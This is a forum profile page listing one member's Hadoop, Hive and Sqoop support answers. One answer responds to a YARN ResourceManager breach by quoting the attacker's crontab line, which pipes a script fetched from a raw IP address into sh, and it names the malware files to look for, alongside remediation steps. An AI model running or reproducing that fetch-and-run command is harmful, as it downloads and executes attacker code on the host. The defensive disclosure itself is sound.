Member since
04-11-2016
535
Posts
148
Kudos Received
77
Solutions
My Accepted Solutions
Title | Views | Posted |
---|---|---|
7581 | 09-17-2018 06:33 AM | |
1856 | 08-29-2018 07:48 AM | |
2791 | 08-28-2018 12:38 PM | |
2173 | 08-03-2018 05:42 AM | |
2026 | 07-27-2018 04:00 PM |
08-16-2018
05:40 AM
@Sudharsan
Ganeshkumar
You could find the location with below queries: 1. describe formatted <table_name>; 2. show create table <table_name>;
... View more
08-13-2018
12:59 PM
@rinu shrivastav The split size is calculated by the formula:- max(mapred.min.split.size, min(mapred.max.split.size, dfs.block.size))
Say, HDFS block size is 64 MB and min.input.size is set to 128MB, then there will be split size would be 128MB. To read 256MB of data, there will be two mappers. To increase the number of mappers, then you could decrease min.input.size till the HDFS block size. split size=max(128,min(256,64))
... View more
08-13-2018
09:14 AM
@sasidhar
Kari
The support for non-ASCII / Unicode characters for field delimiter and confirmed that characters outside of the basic ASCII character set are not well-supported as field delimiters. You will need to reformat your input so that it uses one of the first 128 characters in the unicode list. Characters from \0-\177 (http://asecuritysite.com/coding/asc2) should work well. http://asecuritysite.com/coding/asc2 (second to last column - Oct). Or, you could use custom serde MultiDelimitSerDe while creating the table.
... View more
08-13-2018
07:37 AM
@Sadique
Manzar
Seems like you are hitting HIVE-18258, try setting hive.vectorized.execution.reduce.groupby.enabled to false. Or, contact Hortonworks support for HotFix.
... View more
08-06-2018
12:14 PM
@abcwt112
abcwt112
Can you check if the Hive metastore process running by running command 'ps -ef |grep -i metastore'? If not running, check for the errors under /var/log/hive/hivemetastore.log.
... View more
08-03-2018
05:42 AM
1 Kudo
@Lija Mohan
This is not normal and there is a known security breach and security notification has been sent out regarding the same.
Below is the crontab of 'yarn' user on each host in the cluster which spawns these jobs to the Resource Manager: /2 * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
1. Stop further attacks:
a. Use Firewall / IP table settings to allow access only to whitelisted IP addresses for Resource Manager port (default 8088). Do this on both Resource Managers in your HA setup. This only addresses the current attack. To permanently secure your clusters, all HDP end-points ( e.g WebHDFS) must be blocked from open access outside of firewalls.
b. Make your cluster secure (kerberized).
2. Clean up existing attacks:
a. If you already see the above problem in your clusters, please filter all applications named “MYYARN” and kill them after verifying that these applications are not legitimately submitted by your own users.
b. You will also need to manually login into the cluster machines and check for any process with “z_2.sh” or “/tmp/java” or “/tmp/w.conf” and kill them.
Hortonworks strongly recommends affected customers to involve their internal security team to find out the extent of damage and lateral movement inside network. The affected customers will need to do a clean secure installation after backup and ensure that data is not contaminated.
... View more
07-27-2018
04:00 PM
1 Kudo
@Abhay Kasturia There is no roadmap for the Sqoop 2.x yet.
... View more
07-27-2018
03:38 PM
1 Kudo
@Abhay Kasturia Sqoop 2.x is not supported with current versions of HDP. Latest version of HDP 3.0 is with Sqoop 1.4.7. https://docs.hortonworks.com/HDPDocuments/HDP3/HDP-3.0.0/release-notes/content/comp_versions.html You could upgrade the Sqoop version, however it is not not certified with HDP versions.
... View more
07-19-2018
02:25 PM
@rganeshbabu Can you share the DDL of transactional table?
... View more
07-19-2018
09:42 AM
@Muthukumar S You can follow 'Option 1' with below additional steps:
Stop the cluster. Go to the ambari HDFS configuration and edit the datanode directory configuration: Remove /hadoop/hdfs/data and /hadoop/hdfs/data1. Add /hadoop/hdfs/datanew save. Login into each datanode VM and copy the contents of /data and /data1 into /datanew Change the ownership of /datanew and everything under it to “hdfs”. Start the cluster. FYI, these steps are as KB.
... View more